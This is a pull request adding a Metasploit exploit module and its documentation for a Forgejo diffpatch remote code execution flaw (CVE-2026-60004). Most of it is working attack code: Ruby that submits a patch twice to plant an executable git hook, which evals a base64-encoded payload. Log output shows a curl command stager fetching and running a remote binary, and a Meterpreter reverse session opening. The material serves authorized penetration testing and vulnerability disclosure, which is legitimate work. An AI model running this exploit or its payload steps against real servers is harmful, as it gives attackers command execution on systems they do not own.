### PR TITLE
Add Forgejo diffpatch git hook RCE exploit (CVE-2026-60004)

### DIFF
--- a/documentation/modules/exploit/multi/http/forgejo_diffpatch_hook_rce.md
+++ b/documentation/modules/exploit/multi/http/forgejo_diffpatch_hook_rce.md
@@ -1,0 +1,108 @@
+## Vulnerable Application
+
+### Description
+
+Forgejo instances running versions 7.0.0 through 15.0.5, as well as 16.0.0 and
+16.0.1, are vulnerable to remote code execution via the diffpatch API endpoint.
+
+Submitting the same patch twice to the diffpatch endpoint creates an add/add
+collision that triggers Git's three-way merge fallback (Git >= 2.32). In a bare
+clone, this checks out the patched file into `$GIT_DIR`, so an executable entry
+named `hooks/post-index-change` becomes a live Git hook that executes during
+index writes.
+
+An attacker with write access to any repository can achieve arbitrary command
+execution as the service user. With open registration enabled, this is
+exploitable by an unauthenticated attacker (register, then exploit).
+
+Fixed in Forgejo 15.0.6. Versions 16.0.0 and 16.0.1 were released before the
+fix and remain vulnerable; the fix is included in 16.0.2+.
+
+### Setup
+
+A vulnerable environment can be started with Docker:
+
+```
+docker run -d --name forgejo \
+  -p 3000:3000 -p 222:22 \
+  -e FORGEJO__security__INSTALL_LOCK=true \
+  codeberg.org/forgejo/forgejo:15.0.5
+```
+
+Then create a user account:
+
+```
+docker exec forgejo forgejo admin user create \
+  --username testuser --password password123 \
+  --email test@example.com --must-change-password=false
+```
+
+Alternatively, download a vulnerable version like 15.0.5
+[here](https://code.forgejo.org/forgejo/forgejo/releases/tag/v15.0.5), enable
+open registration via the web UI at `http://<target>:3000/admin/config` and
+register a new account.
+
+## Verification Steps
+
+1. Install the application (follow [Setup](#setup))
+1. Start msfconsole
+1. Do: `use exploit/multi/http/forgejo_diffpatch_hook_rce`
+1. Do: `set RHOSTS <ip>`
+1. Do: `set RPORT <port>`
+1. Do: `set USERNAME <username>`
+1. Do: `set PASSWORD <password>`
+1. Do: `set LHOST <listener ip>`
+1. Do: `run`
+1. You should get a session.
+
+## Targets
+
+### 0 - Linux Command
+
+Executes a Unix command payload (e.g. reverse shell one-liner). Default target.
+
+### 1 - Linux Dropper
+
+Uploads and executes a binary payload using a command stager (curl or wget).
+
+## Options
+
+### USERNAME
+
+A username with repository creation privileges. Required.
+
+### PASSWORD
+
+The password for authentication. Required.
+
+### CmdStagerFlavor
+
+The command stager flavor to use for the Linux Dropper target. Supported values:
+`curl` (default) and `wget`.
+
+## Scenarios
+
+### Forgejo 15.0.5 on Linux
+
+```
+msf exploit(multi/http/forgejo_diffpatch_hook_rce) > run
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Forgejo 15.0.5 is vulnerable
+[!] Sending credentials over an unencrypted connection
+[*] Creating repository...
+[+] Created repository jvoisin/msf-deamwfik
+[*] Using URL: http://127.0.0.1:8080/sKKDypM8NV
+[*] Generated command stager: ["curl -so /tmp/xOQTHcox http://127.0.0.1:8080/sKKDypM8NV;chmod +x /tmp/xOQTHcox;/tmp/xOQTHcox;rm -f /tmp/xOQTHcox"]
+[*] Submitting patch 1/2...
+[*] Submitting patch 2/2 (triggers hook execution)...
+[*] Client 127.0.0.1 (curl/8.18.0) requested /sKKDypM8NV
+[*] Sending payload to 127.0.0.1 (curl/8.18.0)
+[*] Transmitting intermediate midstager...(256 bytes)
+[*] Sending stage (1003868 bytes) to 127.0.0.1
+[+] Hook delivered and executed
+[*] Meterpreter session 26 opened (127.0.0.1:4444 -> 127.0.0.1:59868) at 2026-08-13 14:41:10 +0200
+[*] Deleting repository jvoisin/msf-deamwfik...
+
+meterpreter > 
+```

--- a/modules/exploits/multi/http/forgejo_diffpatch_hook_rce.rb
+++ b/modules/exploits/multi/http/forgejo_diffpatch_hook_rce.rb
@@ -1,0 +1,271 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Forgejo Diffpatch Git Hook Remote Code Execution',
+        'Description' => %q{
+          Forgejo instances with the diffpatch API route enabled are vulnerable
+          to remote code execution. Submitting the same patch twice to the
+          diffpatch endpoint creates an add/add collision that triggers Git's
+          three-way merge fallback (Git >= 2.32). In a bare clone, this checks
+          out the patched file into $GIT_DIR, so an executable entry named
+          hooks/post-index-change becomes a live Git hook that executes during
+          index writes.
+
+          An attacker with write access to any repository can achieve arbitrary
+          command execution as the service user. With open registration, this is
+          exploitable by an unauthenticated attacker.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'xbow-security', # Discovery
+        ],
+        'References' => [
+          ['CVE', '2026-60004'],
+          ['GHSA', 'rcr6-4jqh-j84m'],
+          ['URL', 'https://forgejo.org/2026-07-release-v15-0-6/'],
+        ],
+        'DisclosureDate' => '2026-07-30',
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_AARCH64],
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('TARGETURI', [true, 'Base path to the Forgejo application', '/']),
+        OptString.new('USERNAME', [true, 'Username with repo creation privileges', '']),
+        OptString.new('PASSWORD', [true, 'Password for authentication', '']),
+        OptString.new('CmdStagerFlavor', [false, 'Command stager flavor (curl, wget)', 'curl']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'version')
+    )
+
+    return CheckCode::Unknown('Failed to connect to the target') unless res
+    return CheckCode::Unknown('Unexpected HTTP response') unless res.code == 200
+
+    version_info = res.get_json_document
+    return CheckCode::Unknown('Could not parse version response') if version_info.empty?
+
+    version_str = version_info['version'].to_s
+    return CheckCode::Unknown('No version field in response') if version_str.empty?
+
+    unless version_str.match?(/\+(gitea|forgejo)-/)
+      return CheckCode::Safe('Target does not appear to be Forgejo')
+    end
+
+    forgejo_ver = version_str.split('+').first
+    begin
+      ver = Rex::Version.new(forgejo_ver)
+    rescue ArgumentError
+      return CheckCode::Unknown("Could not parse version: #{forgejo_ver}")
+    end
+
+    if ver < Rex::Version.new('7.0.0')
+      return CheckCode::Safe("Forgejo #{forgejo_ver} predates diffpatch support")
+    end
+
+    # Fixed in 15.0.6+; 16.0.0 and 16.0.1 were released before the fix and remain vulnerable.
+    if (ver >= Rex::Version.new('15.0.6') && ver < Rex::Version.new('16.0.0')) ||
+       ver >= Rex::Version.new('16.0.2')
+      return CheckCode::Safe("Forgejo #{forgejo_ver} is patched")
+    end
+
+    # Probe whether the diffpatch route is reachable (requires auth)
+    username = datastore['USERNAME'].to_s
+    unless username.empty?
+      probe = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'repos', username, 'nonexistent', 'diffpatch'),
+        'authorization' => basic_auth,
+        'ctype' => 'application/json',
+        'data' => {}.to_json
+      )
+      if probe&.code == 404
+        json = probe.get_json_document
+        msg = json['message'].to_s.downcase
+        if msg.include?('no diffpatch') || msg.include?('unknown api')
+          return CheckCode::Safe("Forgejo #{forgejo_ver} has diffpatch route disabled")
+        end
+      end
+    end
+
+    CheckCode::Appears("Forgejo #{forgejo_ver} is vulnerable")
+  end
+
+  def basic_auth
+    "Basic #{Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")}"
+  end
+
+  def api_request(method, path, data = nil)
+    opts = {
+      'method' => method,
+      'uri' => normalize_uri(target_uri.path, path),
+      'authorization' => basic_auth
+    }
+    if data
+      opts['ctype'] = 'application/json'
+      opts['data'] = data.to_json
+    end
+    send_request_cgi(opts)
+  end
+
+  def create_repo(repo_name)
+    res = api_request('POST', 'api/v1/user/repos', {
+      'name' => repo_name,
+      'private' => true,
+      'auto_init' => true,
+      'default_branch' => 'main'
+    })
+
+    fail_with(Failure::Unreachable, 'Target did not respond') unless res
+    fail_with(Failure::NoAccess, 'Authentication failed') if res.code == 401
+    fail_with(Failure::UnexpectedReply, "Failed to create repository: HTTP #{res.code}") unless res.code == 201
+
+    info = res.get_json_document
+    owner = info.dig('owner', 'login') || datastore['USERNAME']
+    print_good("Created repository #{owner}/#{repo_name}")
+    [owner, info['default_branch']]
+  end
+
+  def get_branch_sha(owner, repo_name, branch)
+    res = api_request('GET', "api/v1/repos/#{owner}/#{repo_name}/branches/#{branch}")
+    fail_with(Failure::Unreachable, 'Target did not respond') unless res
+    fail_with(Failure::UnexpectedReply, 'Could not get branch HEAD') unless res.code == 200
+
+    res.get_json_document.dig('commit', 'id')
+  end
+
+  def build_hook_patch(command)
+    encoded = Rex::Text.encode_base64(command).delete("\n")
+    hook = [
+      '#!/bin/sh',
+      'rm -f -- "$0"',
+      "nohup sh -c 'eval \"$(echo #{encoded}|base64 -d)\"' </dev/null >/dev/null 2>&1 &"
+    ].join("\n") + "\n"
+
+    blob_oid = Digest::SHA1.hexdigest("blob #{hook.bytesize}\0#{hook}")
+
+    header = [
+      'diff --git a/hooks/post-index-change b/hooks/post-index-change',
+      'new file mode 100755',
+      "index #{'0' * 40}..#{blob_oid}",
+      '--- /dev/null',
+      '+++ b/hooks/post-index-change',
+      "@@ -0,0 +1,#{hook.count("\n")} @@"
+    ].join("\n") + "\n"
+
+    header + hook.lines.map { |l| "+#{l}" }.join
+  end
+
+  def submit_patch(owner, repo_name, patch, sha, message)
+    api_request('POST', "api/v1/repos/#{owner}/#{repo_name}/diffpatch", {
+      'content' => patch,
+      'message' => message,
+      'branch' => 'main',
+      'new_branch' => 'main',
+      'sha' => sha
+    })
+  end
+
+  def exploit
+    print_warning('Sending credentials over an unencrypted connection') unless ssl
+
+    repo_name = "msf-#{Rex::Text.rand_text_alphanumeric(8).downcase}"
+
+    print_status('Creating repository...')
+    owner, branch = create_repo(repo_name)
+    @repo_to_clean = "#{owner}/#{repo_name}"
+
+    sha = get_branch_sha(owner, repo_name, branch || 'main')
+    fail_with(Failure::UnexpectedReply, 'Could not get branch SHA') unless sha
+
+    cmd = case target['Type']
+          when :linux_dropper
+            flavor = datastore['CmdStagerFlavor']&.to_sym || :curl
+            generate_cmdstager(flavor: flavor, concat_operator: ';', background: true).join("\n")
+          else
+            payload.encoded
+          end
+
+    patch = build_hook_patch(cmd)
+
+    print_status('Submitting patch 1/2...')
+    res = submit_patch(owner, repo_name, patch, sha, 'update')
+    fail_with(Failure::Unreachable, 'Target did not respond to patch 1') unless res
+    fail_with(Failure::UnexpectedReply, "Patch 1 failed: HTTP #{res.code}") unless res.code == 201
+
+    new_sha = res.get_json_document.dig('commit', 'sha')
+    fail_with(Failure::UnexpectedReply, 'No commit SHA in response') unless new_sha
+
+    print_status('Submitting patch 2/2 (triggers hook execution)...')
+    res = submit_patch(owner, repo_name, patch, new_sha, 'trigger')
+    if res.nil?
+      print_good('Payload executed (HTTP response interrupted by hook)')
+    elsif res.code == 201
+      print_good('Hook delivered and executed')
+    else
+      print_warning("Patch 2 returned HTTP #{res&.code} (hook may still have fired)")
+    end
+  end
+
+  def cleanup
+    if @repo_to_clean
+      owner, repo_name = @repo_to_clean.split('/', 2)
+      @repo_to_clean = nil
+      print_status("Deleting repository #{owner}/#{repo_name}...")
+      begin
+        send_request_cgi(
+          'method' => 'DELETE',
+          'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'repos', owner, repo_name),
+          'authorization' => basic_auth
+        )
+      rescue StandardError
+        print_warning("Could not confirm deletion of #{owner}/#{repo_name} — verify manually")
+      end
+    end
+    super
+  end
+end


### PR DESCRIPTION
## Description

Exploits the diffpatch API endpoint in Forgejo 7.0.0 through 15.0.5 and 16.0.0-16.0.1. Submitting a duplicate patch triggers an add/add collision in Git's three-way merge, writing an executable git hook into $GIT_DIR of the bare repository. Requires write access to any repo (or open registration).

Fixed in Forgejo 15.0.6 and 16.0.2.

## Breaking Changes

<!-- Does this PR change existing behavior, remove options, rename datastore settings, or alter API/mixin interfaces? If yes, describe what breaks and how users should adapt. Write "None" if not applicable. -->

None

## Verification Steps

<!-- Provide specific, numbered steps a reviewer can follow to verify this change works as intended. At least one step must describe the expected observable outcome. Generic steps such as "verify it works" will result in the PR being closed. -->

1. - [ ] get a vulnerable binary from https://code.forgejo.org/forgejo/forgejo/releases/tag/v15.0.5
2. - [ ] install it
3. - [ ] enable open registration at http://<target>:3000/admin/config`
4. - [ ] use exploit/multi/http/forgejo_diffpatch_hook_rce
5. - [ ] set RHOSTS/RPORT/USERNAME/PASSWORD/LHOST
6. - [ ] run
7. - [ ] get a session



## Test Evidence

msf exploit(multi/http/forgejo_diffpatch_hook_rce) > run
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Forgejo 15.0.5 is vulnerable
[!] Sending credentials over an unencrypted connection
[*] Creating repository...
[+] Created repository jvoisin/msf-deamwfik
[*] Using URL: http://127.0.0.1:8080/sKKDypM8NV
[*] Generated command stager: ["curl -so /tmp/xOQTHcox http://127.0.0.1:8080/sKKDypM8NV;chmod +x /tmp/xOQTHcox;/tmp/xOQTHcox;rm -f /tmp/xOQTHcox"]
[*] Submitting patch 1/2...
[*] Submitting patch 2/2 (triggers hook execution)...
[*] Client 127.0.0.1 (curl/8.18.0) requested /sKKDypM8NV
[*] Sending payload to 127.0.0.1 (curl/8.18.0)
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (1003868 bytes) to 127.0.0.1
[+] Hook delivered and executed
[*] Meterpreter session 26 opened (127.0.0.1:4444 -> 127.0.0.1:59868) at 2026-08-13 14:41:10 +0200
[*] Deleting repository jvoisin/msf-deamwfik...

meterpreter > 

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Fedora <!-- e.g., Ubuntu 22.04, Windows 11, macOS 14.2 --> |
| **Target Software/Hardware** | Forgejo 15.0.5 <!-- Name and version of the software or hardware targeted by this change --> |


## AI Usage Disclosure

<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->

"None"

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->

<details>
<summary>Hardware and Complex Software Module Guidance</summary>

If your module targets specialized hardware (routers, IoT, PLCs, etc.) or complex software (licensed, multi-service, or multi-version), provide a pcap, screen recording, or video showing successful execution.

Email sanitized pcaps/recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) — remove real IPs, credentials, and hostnames before sending. If hardware/software is unavailable, explain in the PR description.

</details>

<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
